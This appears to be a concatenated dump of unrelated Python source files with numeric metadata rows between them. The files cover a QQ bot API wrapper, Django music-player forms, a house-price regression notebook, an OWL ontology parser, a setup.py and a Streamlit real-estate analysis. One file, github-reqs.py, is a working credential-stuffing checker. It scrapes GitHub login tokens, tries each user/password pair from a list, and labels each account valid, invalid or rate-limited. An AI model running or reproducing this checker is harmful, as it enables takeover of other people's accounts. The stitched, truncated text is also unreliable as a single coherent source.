'pic':os.path.dirname(os.path.realpath(sys.argv[0]))+'\\'+path+'.png'
}
resp = requests.post(url, data=data).text
resp = json.loads(resp)['ret']
return resp
#上传群图片
def uploadgrouppic(loginqq,group,path,type='path'):
url = configs.get('url')+'/uploadgrouppic'
data={
'logonqq': loginqq,
'group': group,
'type':type,
'pic':path
}
resp = requests.post(url, data=data).text
resp = json.loads(resp)['ret']
return resp
#发送群聊消息
def groupmsg(logonqq,group,msg,type=''):
url = configs.get('url') + '/sendgroupmsg'
print('====>触发群消息' )
data = {
'type':type,
'logonqq': logonqq,
'group':group,
'msg':msg,
'anonymous':'false'
}
requests.post(url, data=data)
#添加群
def addgroup(logonqq,group):
url = configs.get('url')+'/addgroup'
data = {
'logonqq': logonqq,
'group': group,
'msg': '你好我是奥迪斯'
}
return requests.post(url,data=data)
#取群列表
def getgrouplist(logonqq):
url = configs.get('url')+'/getgrouplist'
data = {
'logonqq':logonqq
}
resp = requests.post(url,data=data).text
resp = json.loads(resp)['list']['List']
return resp
| 25.156627 | 144 | 0.606322 | 246 | 2,088 | 5.130081 | 0.313008 | 0.055468 | 0.072108 | 0.088748 | 0.336767 | 0.239303 | 0.239303 | 0.239303 | 0.239303 | 0.239303 | 0 | 0.016504 | 0.216475 | 2,088 | 82 | 145 | 25.463415 | 0.75489 | 0.022989 | 0 | 0.394366 | 0 | 0 | 0.186516 | 0.027559 | 0 | 0 | 0 | 0 | 0 | 1 | 0.112676 | false | 0 | 0.042254 | 0 | 0.239437 | 0.028169 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5da98c798e1102a47991773a56205130565910e | 17,288 | py | Python | App/forms.py | dlanghorne0428/StudioMusicPlayer | 54dabab896b96d90b68d6435edfd52fe6a866bc2 | [
"MIT"
] | null | null | null | App/forms.py | dlanghorne0428/StudioMusicPlayer | 54dabab896b96d90b68d6435edfd52fe6a866bc2 | [
"MIT"
] | 44 | 2022-01-21T01:33:59.000Z | 2022-03-26T23:35:25.000Z | App/forms.py | dlanghorne0428/StudioMusicPlayer | 54dabab896b96d90b68d6435edfd52fe6a866bc2 | [
"MIT"
] | null | null | null | from datetime import time
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.forms import Form, ModelForm, CheckboxInput, NumberInput, Textarea
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Column, Div, Field, HTML, Layout, Row, Submit
from crispy_forms.bootstrap import AppendedText, FormActions
from .models.song import Song, SongFileInput, SpotifyTrackInput, DANCE_TYPE_CHOICES, HOLIDAY_CHOICES, HOLIDAY_USE_OPTIONS, HOLIDAY_DEFAULT_USAGE #StreamingSongInput,
from .models.user import User
from .models.playlist import Playlist
class SongFileInputForm(ModelForm):
'''form for uploading new music from a file.'''
class Meta:
model = SongFileInput
# allow user to specify file, dance_type, and select holiday if any
fields = ['audio_file', 'dance_type', 'holiday']
class SpotifyTrackInputForm(ModelForm):
'''form for uploading new music from a file.'''
class Meta:
model = SpotifyTrackInput
# allow user to specify file, dance_type, and select holiday if any
fields = ['track_id', 'title', 'artist', 'dance_type', 'holiday']
class SpotifySearchForm(Form):
search_term = forms.CharField(
label='Keywords',
max_length=100,
required = True)
content_type = forms.ChoiceField(
choices = [("album", "Album"),
("artist", "Artist"),
("playlist", "Playlist"),
("track", "Track")],
widget = forms.RadioSelect,
required = True)
class SongEditForm(ModelForm):
'''form to edit info for an existing song.'''
title = forms.CharField(
label = "Title",
max_length = 80, # ensure the field is wide enough to show the title
required = True,
)
artist = forms.CharField(
label = "Artist",
max_length = 80, # ensure the field is wide enough to show the artist
required = True,
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_id = 'id-songEditForm'
self.helper.form_method = 'post'
# this is needed to return files from the form
self.helper.attrs = {'enctype': 'multipart/form-data'}
self.helper.label_class='fw-bold mt-2' # allow some top margin for the form
self.helper.layout = Layout(
# show the fields in this order
'title',
'artist',
'image',
'dance_type',
'holiday',
FormActions(
# submit button and cancel link in the form of a button
Submit('save', 'Save changes'),
HTML("""<a href="{% url 'App:all_songs' %}" class="btn btn-secondary">Cancel</a>"""),
# add some y-margin around the buttons.
css_class="my-3"
)
)
class Meta:
# obtain data from these fields of the song model
model = Song
fields = ['title', 'artist', 'image', 'dance_type', 'holiday']
class PlaylistInfoForm(ModelForm):
''' form to enter information for a playlist '''
title = forms.CharField(
label = "",
max_length = 50, # ensure the field is wide enough to show the title
required = True)
description = forms.CharField(
label = "Description",
required = False,
# limit height of this field to 3 rows
widget = Textarea(attrs={'rows': 3}))
is_showcase_or_comp = forms.BooleanField(
label = "Competition/Showcase",
required = False) # this field must not be required in order to set it to false
auto_continue = forms.BooleanField(
label = "Autoplay Next Song",
required = False) # this field must not be required in order to set it to false
max_song_duration = forms.ChoiceField(
label = "Song Time Limit",
required = False,
# use a dropdown field for the song time limit
choices = (
(time(minute=30), "------"),
(time(minute=1, second=15), "1:15"),
(time(minute=1, second=30), "1:30"),
(time(minute=1, second=45), "1:45"),
(time(minute=2, second= 0), "2:00"),
(time(minute=2, second=15), "2:15"),
(time(minute=2, second=30), "2:30"),
(time(minute=2, second=45), "2:45"),
(time(minute=3, second= 0), "3:00")
)
)
def __init__(self, *args, **kwargs):
# this form is used for playlist creation and editing.
# submit_title argument tells us which it is.
self.submit_title = kwargs.pop('submit_title')
super(PlaylistInfoForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_id = 'id-PlaylistEditForm'
self.helper.form_method = 'post'
# Form labels will be bold text
self.helper.label_class = 'fw-bold'
if self.submit_title is not None:
self.helper.layout = Layout(
# first row has two columns: title and checkboxes
Row(
Column(
Field('title', css_class='fs-3 px-0 text-center'),
css_class="col-8 offset-2"),
Column('is_showcase_or_comp', 'auto_continue',
css_class="col-2 text-start"),
),
# next row has two columns: description field in the right column is 3 rows tall
Row(
Column('max_song_duration', css_class="col-2 offset-2"),
Column('description',css_class='text-start col-8 lh-sm'),
),
# submit and cancel buttons are included, button text comes from submit_title
FormActions(
Submit('submit', self.submit_title),
HTML("""<a href="{% url 'App:all_playlists' %}" class="btn btn-secondary">Cancel</a>"""),
css_class="my-2"
)
)
else: # same layout as above without submit/cancel buttons as javascript is used to submit the form
self.helper.layout = Layout(
Row(
Column(
Field('title', css_class='fs-3 px-0 text-center'),
css_class="col-8 offset-2"),
Column('is_showcase_or_comp', 'auto_continue',
css_class="col-2 text-start"),
),
Row(
Column('max_song_duration', css_class="col-2 offset-2"),
Column('description',css_class='text-start col-8 lh-sm'),
),
)
class Meta:
model = Playlist
# include these fields in the form
fields = ['title', 'description', 'is_showcase_or_comp', 'auto_continue', 'max_song_duration']
class RandomPlaylistForm(Form):
'''form to specify parameters when populating a random playlist.'''
save_preferences = forms.BooleanField(
label = "Save these settings as the default for your future playlists?",
initial = False,
required = False)
def __init__(self, *args, **kwargs):
# get the preferences in this dictionary argument
self.prefs = kwargs.pop('prefs')
super(RandomPlaylistForm, self).__init__(*args, **kwargs)
self.fields['number_of_songs'] = forms.IntegerField(
label = "Number of Songs",
min_value = 1,
max_value = 100,
initial = self.prefs['playlist_length'],
# center the text in this input box
widget = NumberInput(attrs={'class': 'text-center'}),
required = True)
self.fields['prevent_back_to_back_styles'] = forms.BooleanField(
# add information icon to the end of the label
label = "Prevent Same Style Back-to-Back \u24d8" ,
initial = self.prefs['prevent_back_to_back_styles'],
required = False)
self.fields['prevent_back_to_back_tempos'] = forms.BooleanField(
# add information icon to the end of the label
label = "Prevent Same Tempo Back-to-Back \u24d8" ,
initial = self.prefs['prevent_back_to_back_tempos'],
required = False)
field_names = list()
# these fields allow the user to enter percentages for each dance style
# add them to the form using a loop
for dance_type_tuple in DANCE_TYPE_CHOICES:
# constuct field name based on dance type abbreviation (e.g. 'Cha')
field_name = '%s_pct' % (dance_type_tuple[0], )
self.fields[field_name] = forms.IntegerField(
# field label is the readable name for this dance type
label = dance_type_tuple[1],
min_value = 0,
max_value = 100,
initial = self.prefs['percentages'][dance_type_tuple[0]],
# right-justify the text in these input boxes
widget = NumberInput(attrs={'class': 'text-end'}),
required = True)
# build a list of field names for use in column layout
field_names.append(field_name)
# these fields allow the user to enter preferences for each holiday
# add them to the form using a loop
for holiday_tuple in HOLIDAY_CHOICES:
field_name = "%s_use" % (holiday_tuple[0], )
self.fields[field_name] = forms.ChoiceField(
label = holiday_tuple[1],
choices = HOLIDAY_USE_OPTIONS,
initial = self.prefs['holiday_usage'][holiday_tuple[0]],
required = True
)
field_names.append(field_name)
# see django-crispy-forms example
self.helper = FormHelper()
self.helper.form_id = 'id-random-playlist-Form'
self.helper.form_method = 'post'
self.helper.layout = Layout(
# first row has two columns
Row(
# style the label with font weight bold and font size 5
Column('number_of_songs', css_class="fw-bold fs-5 col-2 offset-4"),
Column(
# add tooltips to these fields. Using Div applies tooltip to combination of label and checkbox
Div('prevent_back_to_back_styles',
data_bs_toggle="tooltip",
data_bs_placement="right",
title="Checking this box prevents the playlist from having two consecutive songs of the same dance style.",
),
Div('prevent_back_to_back_tempos',
data_bs_toggle="tooltip",
data_bs_placement="right",
title="Checking this box prevents the playlist from having two consecutive fast songs or two consecutive slow songs.",
),
# left-justify the second column, keep it toward the middle of the form
css_class='text-start px-4 col-6'),
# align the bottom of the two columns in this row
css_class='align-items-end'
),
# second row has two column titles, one for percentages, the other for holidays
Row(
Column(
HTML("<h4 class='text-center'>Select Percentages for each dance style</h4>"),
HTML("<h6 class='text-center'>Values must add up to 100 percent</h6>"),
# percentage data should take 9/12 of the window
css_class='col-9 text-center',
),
Column(
HTML("<h5 class='text-center'>Include Holiday-Themed Songs?</h5>"),
# holidays only need 3/12 of the windoe
css_class='col-3 text-center',
),
# align the bottom of the two columns in this row
css_class='align-items-end'
),
# next row has two columns, one for percentage data, the other for holiday selections
Row(
Column(
# first column is split into five sub-columns to set percentages for each dance type
Row(
Column(AppendedText(field_names[0], '%', active=True),
AppendedText(field_names[1], '%', active=True),
AppendedText(field_names[2], '%', active=True),
AppendedText(field_names[3], '%', active=True),
# each sub-column takes 2/12 of the enclosing column, first sub-column is offset 1/12
css_class="col-2 offset-1"),
Column(AppendedText(field_names[4], '%', active=True),
AppendedText(field_names[5], '%', active=True),
AppendedText(field_names[6], '%', active=True),
AppendedText(field_names[7], '%', active=True), css_class="col-2"),
Column(AppendedText(field_names[8], '%', active=True),
AppendedText(field_names[9], '%', active=True),
AppendedText(field_names[10], '%', active=True),
AppendedText(field_names[11], '%', active=True), css_class="col-2"),
Column(AppendedText(field_names[12], '%', active=True),
AppendedText(field_names[13], '%', active=True),
AppendedText(field_names[14], '%', active=True),
AppendedText(field_names[15], '%', active=True), css_class="col-2"),
Column(AppendedText(field_names[16], '%', active=True),
AppendedText(field_names[17], '%', active=True),
AppendedText(field_names[18], '%', active=True),
AppendedText(field_names[19], '%', active=True), css_class="col-2"),
# put a dark border around the five subcolumns
css_class='pt-2 border border-dark',
# establish an ID for javascript to use
css_id='enter-percentages'
),
# this row for an error message is centered under the five subcolumns
Row(
# establish an ID so Javascript can modify this error text
HTML("<p hidden id='percentage-error'>Current total is <span id='percentage-total'></span> percent</p>"),
),
css_class='text-center'
),
Column(
# second column determines if holiday songs will be used
Row(
field_names[20], field_names[21], field_names[22], field_names[23],
# put a border around these elements
css_class='pt-2 border border-danger',
# establish an ID for javascript to use
css_id='enter-holidays'
),
# this column takes 3/12 of the window and data is centered within that allocaation
css_class='col-3 text-center'
),
),
# this row has a save checkbox, it is centered in the entire window and has a top margin
Row(
Column('save_preferences'),
css_class = 'col-12 text-center mt-3'
),
# submit and cancel buttons
FormActions(
Submit('continue', 'Continue'),
Submit('cancel', 'Cancel'),
# provide a small margin in the y-direction, top and bottom
css_class="my-1"
)
)
# based on example at: https://github.com/sibtc/django-multiple-user-types-example
class TeacherSignUpForm(UserCreationForm):
'''
Create a signup form for teachers based on Django's User Creation Form.
'''
class Meta(UserCreationForm.Meta):
model = User # specify the model
def save(self, commit=True):
user = super().save(commit=False) # get the object saved by the Django form
user.is_teacher = True # set is_teacher flag
if commit: # save user object if everything ok
user.save()
return user | 45.375328 | 166 | 0.53193 | 1,884 | 17,288 | 4.765924 | 0.203822 | 0.025838 | 0.049003 | 0.045105 | 0.400936 | 0.291681 | 0.234659 | 0.221294 | 0.217062 | 0.201025 | 0 | 0.016788 | 0.372918 | 17,288 | 381 | 167 | 45.375328 | 0.811457 | 0.213616 | 0 | 0.350554 | 0 | 0.01107 | 0.167828 | 0.027576 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01476 | false | 0 | 0.0369 | 0 | 0.136531 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5db6e8ce1d354081b1aa2dec66d342e859e99b3 | 2,839 | py | Python | examples/github-reqs/github-reqs.py | andre798/PyBullet | 53597c96b4c91bfffd3ef85be6162f2dbf1967a9 | [
"MIT"
] | null | null | null | examples/github-reqs/github-reqs.py | andre798/PyBullet | 53597c96b4c91bfffd3ef85be6162f2dbf1967a9 | [
"MIT"
] | null | null | null | examples/github-reqs/github-reqs.py | andre798/PyBullet | 53597c96b4c91bfffd3ef85be6162f2dbf1967a9 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
NAME: github-reqs.py
AUTHOR: Ulyouth
VERSION: 1.0.0
DATE: 15.10.2020
DESC: A PyBullet-based script to check which GitHub logins are valid
using requests library.
"""
from chkutils import ChkUtils
def chkMain(ss, test, rst, captcha, data):
# Good practice, since 'data' can be both a list or string variable,
# depending on the number of elements in each line
if isinstance(data, list):
user = data[0]
pswd = data[1]
else:
# -200 = Exception = Terminate program!
return [-200, 'Invalid list format']
# Class containing a list of useful functions.
chk = ChkUtils()
# Login GET link.
lnk = 'https://github.com/login'
# Retrieve the login page.
r = chk.getnlog(ss, lnk, 'login.htm', 'github', user)
# Obtain the necessary login tokens.
auth_tok = chk.grab(r.text, 'authenticity_token" value="', '"')
tstamp = chk.grab(r.text, 'timestamp" value="', '"')
tsecret = chk.grab(r.text, 'timestamp_secret" value="', '"')
# Check if any tokens are missing.
if len(auth_tok) == 0 or len(tstamp) == 0 or len(tsecret) == 0:
# -1 = Error = Retry!
return [-1, 'Missing token']
elif test == 1:
# Print the tokens if running in test mode.
print('> authenticity_token: ' + auth_tok)
print('> timestamp: ' + tstamp)
print('> timestamp_secret: ' + tsecret)
# Login POST link
lnk = 'https://github.com/session'
# Login POST data dict
data = {'commit': 'Sign in',
'authenticity_token': auth_tok,
# Not sure whats the 'ga_id' for, but it works using always the
# same value.
'ga_id': '1348735984.1584973938',
'login': user,
'password': pswd,
'webauthn-support': 'supported',
'webauthn-iuvpaa-support': 'unsupported',
'return_to': '',
'allow_signup': '',
'client_id': '',
'integration': '',
'required_field_d202': '',
'timestamp': tstamp,
'timestamp_secret': tsecret }
# Attempt to login.
r = chk.postnlog(ss, lnk, 'login.htm', 'github', user, data = data)
# Evaluate the login attempt.
if r.text.find('Signed in as') != -1:
return [100, user] # 100 = Valid password (display in green)
elif r.text.find('Incorrect username or password.') != -1:
return [200, user] # 200 = Invalid password (display in red)
elif r.text.find('There have been several failed attempts') != -1:
return [-2, user] # -2 = Error = Retry!
else:
return [0, user] # 0 = Unknown = Skip (display in yellow)
| 35.049383 | 76 | 0.552659 | 337 | 2,839 | 4.605341 | 0.48368 | 0.01933 | 0.015464 | 0.023196 | 0.083763 | 0.029639 | 0 | 0 | 0 | 0 | 0 | 0.03507 | 0.317013 | 2,839 | 80 | 77 | 35.4875 | 0.765343 | 0.307503 | 0 | 0.046512 | 0 | 0 | 0.288482 | 0.023681 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023256 | false | 0.046512 | 0.023256 | 0 | 0.186047 | 0.069767 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5dd6cd1130e1740cdf8aab7d98bb4815a29fc80 | 1,649 | py | Python | downloaded_kernels/house_sales/converted_notebooks/kernel_60.py | josepablocam/common-code-extraction | a6978fae73eee8ece6f1db09f2f38cf92f03b3ad | [
"MIT"
] | null | null | null | downloaded_kernels/house_sales/converted_notebooks/kernel_60.py | josepablocam/common-code-extraction | a6978fae73eee8ece6f1db09f2f38cf92f03b3ad | [
"MIT"
] | null | null | null | downloaded_kernels/house_sales/converted_notebooks/kernel_60.py | josepablocam/common-code-extraction | a6978fae73eee8ece6f1db09f2f38cf92f03b3ad | [
"MIT"
] | 2 | 2021-07-12T00:48:08.000Z | 2021-08-11T12:53:05.000Z | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
import pandas as pd
housing_data = pd.read_csv("../input/kc_house_data.csv")
features = [u'bedrooms', u'bathrooms', u'sqft_living',
u'floors', u'condition', u'grade', u'sqft_lot15',
u'sqft_lot',
u'sqft_above', u'sqft_living15', u'sqft_basement']
price = housing_data['price']
housing_data = pd.DataFrame(housing_data, columns=features)
housing_data.head()
# In[ ]:
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(housing_data, price, random_state=0)
# In[ ]:
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
sc.fit(X_train)
X_train_std = sc.transform(X_train)
X_test_std = sc.transform(X_test)
# In[ ]:
from pandas import read_csv, DataFrame
from sklearn.neighbors import KNeighborsRegressor
from sklearn.linear_model import LinearRegression, LogisticRegression
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestRegressor
models = [LinearRegression(),
RandomForestRegressor(n_estimators=100, max_features ='sqrt'),
KNeighborsRegressor(n_neighbors=6),
SVR(kernel='linear'),
]
train_results = []
for model in models:
model.fit(X_train_std, y_train)
y_train_pred = model.predict(X_train_std)
y_test_pred = model.predict(X_test_std)
train_results.append([model, y_train_pred, y_test_pred])
accuracy = model.score(X_test_std, y_test)
print("Accuracy: {}%".format(int(round(accuracy * 100))))
# We can see what RandomForestRegressor coped best with this task, as much as 69(70) percent.
| 24.984848 | 93 | 0.724682 | 233 | 1,649 | 4.88412 | 0.416309 | 0.057996 | 0.018453 | 0.019332 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012292 | 0.16131 | 1,649 | 65 | 94 | 25.369231 | 0.810557 | 0.09339 | 0 | 0 | 0 | 0 | 0.104839 | 0.017473 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.235294 | 0 | 0.235294 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5dd8fab99ed6bdc735238b1925cb9d8d989746e | 4,580 | py | Python | pgel_sat/owl/parser.py | AndrewIjano/pgel-sat | 25b6ef5922a9fa79bbcf9896cf9a5eefd9925e45 | [
"MIT"
] | null | null | null | pgel_sat/owl/parser.py | AndrewIjano/pgel-sat | 25b6ef5922a9fa79bbcf9896cf9a5eefd9925e45 | [
"MIT"
] | null | null | null | pgel_sat/owl/parser.py | AndrewIjano/pgel-sat | 25b6ef5922a9fa79bbcf9896cf9a5eefd9925e45 | [
"MIT"
] | null | null | null | import owlready2 as owl
from .. import gel, pgel
from . import pbox_parser
def parse(file: str):
onto = owl.get_ontology(file)
onto.load()
kb = get_kb(onto)
pbox_restrictions = pbox_parser.get_restrictions(onto)
return kb, pbox_restrictions
def get_kb(onto):
owl_concepts = list(onto.classes())
owl_individuals = list(onto.individuals())
owl_roles = onto.object_properties()
kb = pgel.ProbabilisticKnowledgeBase(owl.Nothing.iri, owl.Thing.iri)
add_concepts(kb, owl_concepts, gel.Concept)
add_concepts(kb, owl_individuals, gel.IndividualConcept)
add_roles(kb, owl_roles)
add_role_inclusions_from_roles(kb, owl_roles)
owl_basic_concepts = [owl.Thing] + owl_concepts + owl_individuals
add_axioms_from_concepts(kb, owl_basic_concepts)
return kb
def add_concepts(kb, owl_concepts, concept_class: type):
for owl_concept in owl_concepts:
kb.add_concept(concept_class(owl_concept.iri))
def add_roles(kb, owl_roles):
for owl_role in owl_roles:
kb.add_role(gel.Role(owl_role.iri))
def add_role_inclusions_from_roles(kb, owl_roles):
for owl_sup_role in owl_roles:
for owl_sub_role in owl_sup_role.get_property_chain():
add_chained_role_inclusion(kb, owl_sub_role, owl_sup_role)
for owl_sub_role in owl_sup_role.subclasses():
add_role_inclusion(kb, owl_sub_role, owl_sup_role)
def add_chained_role_inclusion(kb, owl_sub_role_chain, owl_sup_role):
owl_sub_role1, owl_sub_role2 = owl_sub_role_chain.properties
kb.add_chained_role_inclusion(
(owl_sub_role1.iri, owl_sub_role2.iri),
owl_sup_role.iri)
def add_role_inclusion(kb, owl_sub_role, owl_sup_role):
kb.add_role_inclusion(owl_sub_role.iri, owl_sup_role.iri)
def add_axioms_from_concepts(kb, owl_concepts):
for sub_concept in owl_concepts:
if sub_concept == owl.Nothing:
continue
for sup_concept in sub_concept.is_a:
# ignore trivial axioms
if sup_concept == owl.Thing:
continue
add_axiom(kb, sub_concept, sup_concept)
for sup_concept in sub_concept.equivalent_to:
add_axiom(kb, sub_concept, sup_concept)
add_axiom(kb, sup_concept, sub_concept)
if not is_concept(sub_concept):
for sup_concept, role in get_individual_sup_and_role(sub_concept):
pbox_id = pbox_parser.get_id(sub_concept, sup_concept)
kb.add_axiom(
sub_concept.iri,
sup_concept.iri,
role.iri,
pbox_id)
def add_axiom(kb, owl_sub_concept, owl_sup_concept):
sub_concept_iri = get_sub_concept_iri(kb, owl_sub_concept)
sup_concept_iri = get_sup_concept_iri(owl_sup_concept)
role_iri = get_role_iri(kb, owl_sup_concept)
pbox_id = pbox_parser.get_id(owl_sub_concept, owl_sup_concept)
kb.add_axiom(sub_concept_iri, sup_concept_iri, role_iri, pbox_id)
def get_sub_concept_iri(kb, owl_sub_concept):
sub_concept = owl_sub_concept
if is_existential(owl_sub_concept):
sub_concept = create_existential_concept(owl_sub_concept)
if sub_concept not in kb.concepts:
kb.add_concept(sub_concept)
return sub_concept.iri
def get_role_iri(kb, owl_sup_concept):
return extract_role_iri(owl_sup_concept) if is_existential(
owl_sup_concept) else kb.is_a.iri
def get_sup_concept_iri(owl_sup_concept):
return extract_concept_iri(owl_sup_concept) if is_existential(
owl_sup_concept) else owl_sup_concept.iri
def create_existential_concept(owl_concept):
role_iri = extract_role_iri(owl_concept)
concept_iri = extract_concept_iri(owl_concept)
existential_concept = gel.ExistentialConcept(role_iri, concept_iri)
return existential_concept
def is_existential(owl_concept):
return isinstance(owl_concept, owl.class_construct.Restriction)
def is_concept(owl_concept):
return isinstance(owl_concept, owl.entity.ThingClass)
def extract_role_iri(owl_existential_concept):
return type(owl_existential_concept.property()).iri
def extract_concept_iri(owl_existential_concept):
return type(owl_existential_concept.value()).iri
def get_individual_sup_and_role(owl_individual_concept):
for role in owl_individual_concept.get_properties():
sup_concepts = owl_individual_concept.__getattr__(role.name)
for sup_concept in sup_concepts:
yield sup_concept, role
if __name__ == '__main__':
parse('../data/example.owl')
| 31.156463 | 78 | 0.729694 | 670 | 4,580 | 4.543284 | 0.120896 | 0.088699 | 0.046978 | 0.019711 | 0.464849 | 0.385677 | 0.330486 | 0.220105 | 0.144875 | 0.09724 | 0 | 0.001358 | 0.19607 | 4,580 | 146 | 79 | 31.369863 | 0.825367 | 0.004585 | 0 | 0.040816 | 0 | 0 | 0.005925 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.183673 | false | 0 | 0.030612 | 0.061224 | 0.316327 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5ddc99605250642acabc6c67ce2c33587aadd67 | 1,199 | py | Python | setup.py | FilippoBovo/robustats | 80e1712ede9d40de0b1524b31247fc4233c3c01a | [
"MIT"
] | 35 | 2019-08-05T12:46:28.000Z | 2022-01-25T10:37:32.000Z | setup.py | FilippoBovo/robustats | 80e1712ede9d40de0b1524b31247fc4233c3c01a | [
"MIT"
] | 14 | 2020-01-25T19:04:03.000Z | 2022-02-03T18:09:40.000Z | setup.py | FilippoBovo/robustats | 80e1712ede9d40de0b1524b31247fc4233c3c01a | [
"MIT"
] | 9 | 2019-08-12T21:15:47.000Z | 2021-03-11T03:15:43.000Z | from setuptools import Extension, setup
try:
import numpy.distutils.misc_util
except ModuleNotFoundError:
from setuptools import dist
dist.Distribution().fetch_build_eggs(["numpy"])
import numpy.distutils.misc_util
with open("README.md", "r") as f:
long_description = f.read()
setup(
name="robustats",
version="0.1.7",
description="Robustats is a Python library for high-performance computation" " of robust statistical estimators.",
long_description=long_description,
long_description_content_type="text/markdown",
classifiers=[
"Programming Language :: Python :: 3",
],
url="https://github.com/FilippoBovo/robustats",
download_url="https://github.com/FilippoBovo/robustats/archive/" "v0.1.5.tar.gz",
author="Filippo Bovo",
author_email="bovo.filippo@gmail.com",
license="MIT",
packages=["robustats"],
install_requires=["numpy"],
ext_modules=[
Extension(
name="_robustats",
sources=["c/_robustats.c", "c/robustats.c", "c/base.c"],
extra_compile_args=["-std=c99"],
include_dirs=numpy.distutils.misc_util.get_numpy_include_dirs(),
)
],
)
| 29.243902 | 118 | 0.667223 | 140 | 1,199 | 5.55 | 0.621429 | 0.07722 | 0.069498 | 0.084942 | 0.16731 | 0.095238 | 0 | 0 | 0 | 0 | 0 | 0.009317 | 0.194329 | 1,199 | 40 | 119 | 29.975 | 0.795031 | 0 | 0 | 0.117647 | 0 | 0 | 0.316097 | 0.018349 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5deb628bbf28f92e9fb877f806010e3dd5181f9 | 11,265 | py | Python | House Rocket Company/projeto_portifolio.py | IgorQueiroz32/curso_meigaron_pyhton_ao_ds | 91e7b8336065dc841f620847997156bad6fed35e | [
"MIT"
] | null | null | null | House Rocket Company/projeto_portifolio.py | IgorQueiroz32/curso_meigaron_pyhton_ao_ds | 91e7b8336065dc841f620847997156bad6fed35e | [
"MIT"
] | null | null | null | House Rocket Company/projeto_portifolio.py | IgorQueiroz32/curso_meigaron_pyhton_ao_ds | 91e7b8336065dc841f620847997156bad6fed35e | [
"MIT"
] | null | null | null | import pandas as pd
import streamlit as st
import numpy as np
import plotly.express as px
st.set_page_config(layout='wide')# deixa a tabela no site maior, mais larga
# read data
@st.cache(allow_output_mutation=True) # funcao q permite ler os dados da memoria virtual
def get_data(path):
data = pd.read_csv(path)
return data
# Load data
path = 'kc_house_data.csv'
data = get_data(path)
# transformation
# excluding outliers
data.drop(data[data['bedrooms']>11].index,inplace=True)
data.drop(data[(data['bedrooms']==0) | (data['bathrooms']==0)].index,inplace=True)
data.drop(data[(data['id']==125059179) | (data['id']==125059178)].index,inplace=True)
# data transformation
pd.set_option('display.float_format', lambda x: '%.3f' % x)
data['date'] = pd.to_datetime(data['date']).dt.strftime('%Y-%m-%d')
data['month_day'] = pd.to_datetime(data['date']).dt.strftime('%m-%d')
st.title('House Rocket Company')
st.markdown('Welcome to House Rocket Data Analysis')
# solving first question (which houses should be bought)
st.header('Houses to Buy')
price_median_buy = data[['price', 'zipcode']].groupby('zipcode').median().reset_index()
price_median_buy.columns = ['zipcode', 'price_median_buy']
houses_to_buy = pd.merge(data,price_median_buy,on='zipcode',how='inner')
for i in range(len(houses_to_buy)):
if (houses_to_buy.loc[i, 'price'] < houses_to_buy.loc[i, 'price_median_buy']) & (
houses_to_buy.loc[i, 'condition'] >= 3):
houses_to_buy.loc[i, 'status'] = 'buy'
else:
houses_to_buy.loc[i, 'status'] = 'do not buy'
first_column = houses_to_buy.pop('status')
houses_to_buy.insert(0, 'status', first_column)
st.dataframe(houses_to_buy)
st.write("This table informs which house is indicated to buy, also it presents all houses characteristics.")
#solving first question second part
st.header('Houses Recommendation to Buy')
for i in range(len(houses_to_buy)):
if (houses_to_buy.loc[i, 'bedrooms'] >= 8) | (houses_to_buy.loc[i, 'sqft_lot'] >= 1074218) | (
houses_to_buy.loc[i, 'bathrooms'] >= 4.25):
houses_to_buy.loc[i, 'recommendation_to_buy'] = 'very_high'
elif (houses_to_buy.loc[i, 'floors'] >= 2) & (houses_to_buy.loc[i, 'bedrooms'] >= 4) & (
